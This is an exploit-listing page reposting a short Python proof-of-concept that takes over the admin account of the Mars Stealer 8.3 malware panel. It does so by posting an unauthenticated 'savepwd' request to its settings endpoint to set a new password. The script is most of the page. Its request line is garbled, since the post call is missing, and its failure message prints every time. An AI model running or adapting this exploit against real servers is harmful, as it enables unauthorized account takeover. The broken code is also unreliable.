Mars Stealer 8.3 Account Takeover

CVE Category Price Severity
N/A CWE-300 $500 High
Author Risk Exploitation Type Date
Unknown Author High Remote 2023-04-27

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Mars Stealer 8.3 Account Takeover
# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
# Product: Mars Stelaer
# Technology: PHP
# Version: < 8.3
# Google Dork: N/A
# Date: 20.04.2023
# Tested on: Linux 
# Author: Skll -

import argparse
import requests

parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
parser.add_argument('-u', '--url', required=True, help='Example: python3 -u http://localhost/')
args = parser.parse_args()

url = args.url.rstrip('/') + '/includes/settingsactions.php'
headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Skll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
data = {"func": "savepwd", "pwd": "skll"} #change password
response =, headers=headers, data=data)

if response.status_code == 200:
    print("New Password: " + data["pwd"])
print("Exploit Failed!")

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.